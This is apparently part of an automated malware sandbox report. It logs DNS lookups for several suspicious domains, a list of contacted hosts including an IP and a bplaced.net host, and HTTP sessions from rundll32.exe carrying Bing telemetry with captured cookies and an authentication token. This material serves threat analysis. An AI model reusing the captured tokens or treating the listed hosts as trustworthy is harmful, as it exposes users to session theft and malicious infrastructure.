                                                                                                                                                    Sep 29, 2022 15:01:48.123111963 CEST8.8.8.8192.168.2.30x4636Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:49.294842005 CEST8.8.8.8192.168.2.30x340fName error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:50.685247898 CEST8.8.8.8192.168.2.30xc91aName error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:50.999239922 CEST8.8.8.8192.168.2.30x6573Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:51.024441957 CEST8.8.8.8192.168.2.30x432bName error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:51.844839096 CEST8.8.8.8192.168.2.30xf6edName error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:52.074239969 CEST8.8.8.8192.168.2.30xa8c5Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:52.099947929 CEST8.8.8.8192.168.2.30x752cName error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:52.914760113 CEST8.8.8.8192.168.2.30x16bcName error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:53.457640886 CEST8.8.8.8192.168.2.30x247dName error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:53.482490063 CEST8.8.8.8192.168.2.30xd6f2Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:54.216322899 CEST8.8.8.8192.168.2.30x5a8aName error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:54.401379108 CEST8.8.8.8192.168.2.30xc7dName error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:54.426865101 CEST8.8.8.8192.168.2.30xfb8fName error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:55.143877983 CEST8.8.8.8192.168.2.30x9d8aName error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:55.346767902 CEST8.8.8.8192.168.2.30xa9a1Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:55.368249893 CEST8.8.8.8192.168.2.30x17b5Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:01:56.282361984 CEST8.8.8.8192.168.2.30x3d9fNo error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:00.544599056 CEST8.8.8.8192.168.2.30xce75Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:02.210223913 CEST8.8.8.8192.168.2.30x792eName error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:02.618947029 CEST8.8.8.8192.168.2.30x9440No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:02.773181915 CEST8.8.8.8192.168.2.30xb9b8Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:05.621788979 CEST8.8.8.8192.168.2.30xa95No error (0)www.vikingwebscanner.com185.53.177.53A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:05.628994942 CEST8.8.8.8192.168.2.30x86dbNo error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:07.610702038 CEST8.8.8.8192.168.2.30x362cNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:07.610702038 CEST8.8.8.8192.168.2.30x362cNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:07.610702038 CEST8.8.8.8192.168.2.30x362cNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:07.610702038 CEST8.8.8.8192.168.2.30x362cNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:07.857619047 CEST8.8.8.8192.168.2.30xce14No error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:07.905617952 CEST8.8.8.8192.168.2.30xa5f9No error (0)arizonacode.bplaced.net162.55.0.137A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:08.346271992 CEST8.8.8.8192.168.2.30x2c20Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:13.611136913 CEST8.8.8.8192.168.2.30x7fa5Name error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:14.248188972 CEST8.8.8.8192.168.2.30x6f6dName error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:14.972249031 CEST8.8.8.8192.168.2.30xeefdNo error (0)google.ru172.217.168.67A (IP address)IN (0x0001)false
                                                                                                                                                    Sep 29, 2022 15:02:22.443806887 CEST8.8.8.8192.168.2.30x7e6bName error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                    • https:
                                                                                                                                                      • www.bing.com
                                                                                                                                                    • fs.microsoft.com
                                                                                                                                                    • github.com
                                                                                                                                                    • raw.githubusercontent.com
                                                                                                                                                    • yandex.ru
                                                                                                                                                    • login.live.com
                                                                                                                                                    • watson.telemetry.microsoft.com
                                                                                                                                                    • google.ru
                                                                                                                                                    • searchdusty.com
                                                                                                                                                    • www.vikingwebscanner.com
                                                                                                                                                    • google.com
                                                                                                                                                    • 78.159.97.210
                                                                                                                                                    • arizonacode.bplaced.net
                                                                                                                                                    • powertoolsforyou.com
                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    0192.168.2.349706204.79.197.200443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:34 UTC0OUTPOST /threshold/xls.aspx HTTP/1.1
                                                                                                                                                    Origin: https://www.bing.com
                                                                                                                                                    Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                                                    X-PositionerType: Desktop
                                                                                                                                                    X-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguage
                                                                                                                                                    X-Search-SafeSearch: Moderate
                                                                                                                                                    X-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}
                                                                                                                                                    X-UserAgeClass: Unknown
                                                                                                                                                    X-BM-Market: US
                                                                                                                                                    X-BM-DateFormat: M/d/yyyy
                                                                                                                                                    X-CortanaAccessAboveLock: false
                                                                                                                                                    X-Device-OSSKU: 48
                                                                                                                                                    X-BM-DTZ: -420
                                                                                                                                                    X-BM-FirstEnabledTime: 132061295966656129
                                                                                                                                                    X-DeviceID: 0100748C09004E33
                                                                                                                                                    X-BM-DeviceScale: 100
                                                                                                                                                    X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard Time
                                                                                                                                                    X-BM-Theme: 000000;0078d7
                                                                                                                                                    X-BM-DeviceDimensionsLogical: 1232x1024
                                                                                                                                                    X-BM-DeviceDimensions: 1232x1024
                                                                                                                                                    X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3D
                                                                                                                                                    X-Agent-DeviceId: 0100748C09004E33
                                                                                                                                                    X-BM-CBT: 1660685844
                                                                                                                                                    X-Device-isOptin: true
                                                                                                                                                    X-Device-Touch: false
                                                                                                                                                    X-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018
                                                                                                                                                    X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                                                                    X-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader
                                                                                                                                                    X-MSEdge-ExternalExpType: JointCoord
                                                                                                                                                    X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40
                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                                                                                                                                    Host: www.bing.com
                                                                                                                                                    Content-Length: 429
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Cookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1664488707263&AC=1&CPH=4ef661f2; SRCHUID=V=2&GUID=CAFE605AAF964660B8479EEA5D4FD3FE&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20220929; SRCHHPGUSR=SRCHLANG=en; ANON=A=E6EAEF30D7E9C145923C068AFFFFFFFF; MUIDB=1E17B9B70E9B4C6E957D159ED3646FFF
                                                                                                                                                    2022-09-29 12:58:34 UTC5OUTData Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 31 34 44 35 41 36 39 41 42 45 46 46 36 39 36 32 30 31 34 35 41 44 30 35 42 46 43 37 36 38 35 38 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 49 51 75 65 75 65 45 72 72 6f 72 3c 2f 54 3e 3c 49 47 3e 43 30 34 30 39 45 38 34 43 37 45 43 34 44 31 36 41 32 43 44 44 41 34 38 30 35 45 32 44 33 43 34 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 65 72 72 6f 72 54 79 70 65 22 3a 22 51 75 65 75 65 4f 76 65 72 66 6c 6f 77 22 2c 22 66 61 69 6c 43 6f 75 6e 74 22 3a 31 2c 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49
                                                                                                                                                    Data Ascii: <ClientInstRequest><CID>14D5A69ABEFF69620145AD05BFC76858</CID><Events><E><T>Event.CIQueueError</T><IG>C0409E84C7EC4D16A2CDDA4805E2D3C4</IG><D><![CDATA[{"errorType":"QueueOverflow","failCount":1,"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/I
                                                                                                                                                    2022-09-29 12:58:34 UTC93INHTTP/1.1 204 No Content
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Cache: CONFIG_NOCACHE
                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                    X-MSEdge-Ref: Ref A: E4011595E92F4454A6EB46B2F6535880 Ref B: FRA31EDGE0707 Ref C: 2022-09-29T12:58:34Z
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:58:34 GMT
                                                                                                                                                    Connection: close


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    1192.168.2.349705204.79.197.200443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:34 UTC2OUTPOST /threshold/xls.aspx HTTP/1.1
                                                                                                                                                    Origin: https://www.bing.com
                                                                                                                                                    Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                                                    Content-type: text/xml
                                                                                                                                                    X-MSEdge-ExternalExpType: JointCoord
                                                                                                                                                    X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40
                                                                                                                                                    X-PositionerType: Desktop
                                                                                                                                                    X-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguage
                                                                                                                                                    X-Search-SafeSearch: Moderate
                                                                                                                                                    X-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}
                                                                                                                                                    X-UserAgeClass: Unknown
                                                                                                                                                    X-BM-Market: US
                                                                                                                                                    X-BM-DateFormat: M/d/yyyy
                                                                                                                                                    X-CortanaAccessAboveLock: false
                                                                                                                                                    X-Device-OSSKU: 48
                                                                                                                                                    X-BM-DTZ: -420
                                                                                                                                                    X-BM-FirstEnabledTime: 132061295966656129
                                                                                                                                                    X-DeviceID: 0100748C09004E33
                                                                                                                                                    X-BM-DeviceScale: 100
                                                                                                                                                    X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard Time
                                                                                                                                                    X-BM-Theme: 000000;0078d7
                                                                                                                                                    X-BM-DeviceDimensionsLogical: 1232x1024
                                                                                                                                                    X-BM-DeviceDimensions: 1232x1024
                                                                                                                                                    X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3D
                                                                                                                                                    X-Agent-DeviceId: 0100748C09004E33
                                                                                                                                                    X-BM-CBT: 1660685844
                                                                                                                                                    X-Device-isOptin: true
                                                                                                                                                    X-Device-Touch: false
                                                                                                                                                    X-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018
                                                                                                                                                    X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                                                                    X-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                                                                                                                                    Host: www.bing.com
                                                                                                                                                    Content-Length: 89768
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Cookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1664488707263&AC=1&CPH=4ef661f2; SRCHUID=V=2&GUID=CAFE605AAF964660B8479EEA5D4FD3FE&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20220929; SRCHHPGUSR=SRCHLANG=en; ANON=A=E6EAEF30D7E9C145923C068AFFFFFFFF; MUIDB=1E17B9B70E9B4C6E957D159ED3646FFF
                                                                                                                                                    2022-09-29 12:58:34 UTC6OUTData Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 31 34 44 35 41 36 39 41 42 45 46 46 36 39 36 32 30 31 34 35 41 44 30 35 42 46 43 37 36 38 35 38 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 62 38 39 65 62 65 32 38 63 66 65 39 34 31 35 66 38 61 64 65 33 38 62 63 66 66 64 35 32 65 38 61 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65
                                                                                                                                                    Data Ascii: <ClientInstRequest><CID>14D5A69ABEFF69620145AD05BFC76858</CID><Events><E><T>Event.ClientInst</T><IG>b89ebe28cfe9415f8ade38bcffd52e8a</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,Ambie
                                                                                                                                                    2022-09-29 12:58:34 UTC22OUTData Raw: 54 53 3e 3c 2f 45 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 49 51 75 65 75 65 45 72 72 6f 72 3c 2f 54 3e 3c 49 47 3e 37 33 38 35 64 65 38 36 32 35 66 62 34 33 31 30 62 37 30 35 39 37 30 62 32 38 64 35 35 38 62 33 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65 6e 74 57 69 64 65 73 63 72 65 65 6e 2c 72 73 31 6d 75 73 69 63 70 72 6f 64 2c 43 6f 72 74 61 6e 61 53 50 41 58 61 6d 6c 48 65 61 64 65 72 22 2c 22 65 72 72 6f 72 54 79 70 65 22 3a 22
                                                                                                                                                    Data Ascii: TS></E><E><T>Event.CIQueueError</T><IG>7385de8625fb4310b705970b28d558b3</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader","errorType":"
                                                                                                                                                    2022-09-29 12:58:34 UTC38OUTData Raw: 40 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2b 63 73 2f 72 2f 2f 40 30 2f 6d 61 6e 69 66 65 73 74 25 32 46 74 68 72 65 73 68 6f 6c 64 2e 61 70 70 63 61 63 68 65 2f 6f 74 68 65 72 2f 30 2f 40 31 2f 63 73 2f 2d 31 2f 63 73 2f 2d 31 2f 2d 31 2f 2d 31 2b 63 7a 2f 73 2f 2f 40 30 2f 46 72 61 6d 65 77 6f 72 6b 2f 40 33 2f 30 2f 40 31 2f 63 7a 2f 2d 31 2f 63 7a 2f 64 30 2f 64 30 2f 64 30 2b 65 31 2f 74 2f 2f 40 30 2f 74 68 72 65 73 68 6f 6c 64 25 32 46 78 6c 73 2e 61 73 70 78 2f 78 6d 6c 68 74 74 70 72 65 71 75 65 73 74 2f 30 2f 40 31 2f 65 31 2f 2d 31 2f 65 31 2f 2d 31 2f 2d 31 2f 2d 31 2b 65 74 2f 75 2f 2f 40 30 2f 56 32 25 32 46 32 2c 53 57 56 53 2f 2f 30 2f 40 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2f 2d 31 2b 65 74 2f 76 2f 2f 40 30
                                                                                                                                                    Data Ascii: @1/-1/-1/-1/-1/-1/-1+cs/r//@0/manifest%2Fthreshold.appcache/other/0/@1/cs/-1/cs/-1/-1/-1+cz/s//@0/Framework/@3/0/@1/cz/-1/cz/d0/d0/d0+e1/t//@0/threshold%2Fxls.aspx/xmlhttprequest/0/@1/e1/-1/e1/-1/-1/-1+et/u//@0/V2%2F2,SWVS//0/@1/-1/-1/-1/-1/-1/-1+et/v//@0
                                                                                                                                                    2022-09-29 12:58:34 UTC54OUTData Raw: 22 3a 5b 7b 22 54 22 3a 22 4c 2e 55 72 6c 22 2c 22 4b 22 3a 22 31 31 34 2e 31 22 7d 5d 7d 5d 7d 5d 7d 5d 5d 5d 3e 3c 2f 4c 3e 3c 2f 50 61 67 65 3e 3c 54 53 3e 31 35 39 35 35 32 33 39 36 32 35 35 36 3c 2f 54 53 3e 3c 4f 76 72 3e 3c 72 65 71 75 65 73 74 49 6e 66 6f 20 6b 65 79 3d 22 52 61 77 51 75 65 72 79 22 20 76 61 6c 75 65 3d 22 74 61 73 6b 20 6d 61 6e 61 67 65 72 22 2f 3e 3c 72 65 71 75 65 73 74 49 6e 66 6f 20 6b 65 79 3d 22 49 73 51 75 65 72 79 22 20 76 61 6c 75 65 3d 22 66 61 6c 73 65 22 2f 3e 3c 72 65 71 75 65 73 74 49 6e 66 6f 20 6b 65 79 3d 22 46 6f 72 6d 22 20 76 61 6c 75 65 3d 22 22 2f 3e 3c 75 73 65 72 49 6e 66 6f 20 6b 65 79 3d 22 41 70 70 4e 61 6d 65 22 20 76 61 6c 75 65 3d 22 53 6d 61 72 74 53 65 61 72 63 68 22 2f 3e 3c 2f 4f 76 72 3e 3c 2f
                                                                                                                                                    Data Ascii: ":[{"T":"L.Url","K":"114.1"}]}]}]}]...</L></Page><TS>1595523962556</TS><Ovr><requestInfo key="RawQuery" value="task manager"/><requestInfo key="IsQuery" value="false"/><requestInfo key="Form" value=""/><userInfo key="AppName" value="SmartSearch"/></Ovr></
                                                                                                                                                    2022-09-29 12:58:34 UTC69OUTData Raw: 74 69 6f 6e 22 3a 34 2c 22 44 65 76 69 63 65 49 44 22 3a 22 7b 41 32 41 42 35 32 36 41 2d 44 33 38 44 2d 34 46 43 39 2d 38 42 41 30 2d 45 33 34 42 38 44 36 33 35 34 45 38 7d 22 2c 22 49 73 54 6f 75 63 68 22 3a 22 66 61 6c 73 65 22 2c 22 4f 53 53 4b 55 22 3a 22 34 38 22 2c 22 41 70 70 4c 69 66 65 74 69 6d 65 49 44 22 3a 22 38 37 45 42 42 36 30 36 45 43 33 34 34 33 32 38 41 30 31 36 34 36 44 31 46 41 38 38 30 37 43 33 22 2c 22 43 6f 72 74 61 6e 61 4f 70 74 49 6e 22 3a 22 74 72 75 65 22 2c 22 43 6f 72 74 61 6e 61 43 61 70 61 62 69 6c 69 74 69 65 73 22 3a 22 43 6f 72 74 61 6e 61 45 78 70 65 72 69 65 6e 63 65 2c 53 70 65 65 63 68 4c 61 6e 67 75 61 67 65 22 2c 22 49 6d 70 72 65 73 73 69 6f 6e 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e
                                                                                                                                                    Data Ascii: tion":4,"DeviceID":"{A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}","IsTouch":"false","OSSKU":"48","AppLifetimeID":"87EBB606EC344328A01646D1FA8807C3","CortanaOptIn":"true","CortanaCapabilities":"CortanaExperience,SpeechLanguage","ImpressionUrl":"https://www.bing.
                                                                                                                                                    2022-09-29 12:58:34 UTC85OUTData Raw: 5c 5c 73 65 72 76 69 63 65 73 2e 6d 73 63 22 2c 22 44 4e 61 6d 65 22 3a 22 53 65 72 76 69 63 65 73 22 2c 22 4c 41 44 22 3a 22 32 30 32 30 2d 30 37 2d 32 33 54 31 36 3a 35 32 3a 35 38 2e 37 30 33 5a 22 2c 22 41 70 70 4c 6e 63 68 22 3a 31 2c 22 41 72 67 73 22 3a 30 2c 22 4d 44 4e 22 3a 30 2c 22 45 78 74 22 3a 22 2e 6d 73 63 22 7d 2c 22 52 61 6e 6b 65 72 53 69 67 6e 61 6c 73 22 3a 7b 22 72 61 6e 6b 69 6e 67 53 63 6f 72 65 22 3a 38 2e 35 35 38 35 2c 22 66 65 61 74 75 72 65 53 74 6f 72 65 22 3a 7b 22 31 22 3a 31 2c 22 32 22 3a 31 2c 22 37 22 3a 39 35 36 39 2c 22 38 22 3a 31 2c 22 39 22 3a 30 2e 30 31 37 34 32 2c 22 31 30 22 3a 37 2c 22 31 33 22 3a 31 2c 22 31 36 22 3a 34 32 37 32 2c 22 34 32 22 3a 31 2c 22 38 33 22 3a 31 2c 22 31 30 33 22 3a 31 2c 22 31 33 34
                                                                                                                                                    Data Ascii: \\services.msc","DName":"Services","LAD":"2020-07-23T16:52:58.703Z","AppLnch":1,"Args":0,"MDN":0,"Ext":".msc"},"RankerSignals":{"rankingScore":8.5585,"featureStore":{"1":1,"2":1,"7":9569,"8":1,"9":0.01742,"10":7,"13":1,"16":4272,"42":1,"83":1,"103":1,"134
                                                                                                                                                    2022-09-29 12:58:34 UTC94INHTTP/1.1 204 No Content
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Cache: CONFIG_NOCACHE
                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                    X-MSEdge-Ref: Ref A: 7207F4309A774A229CA0A85DAA76CC1B Ref B: FRA31EDGE0717 Ref C: 2022-09-29T12:58:34Z
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:58:34 GMT
                                                                                                                                                    Connection: close


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
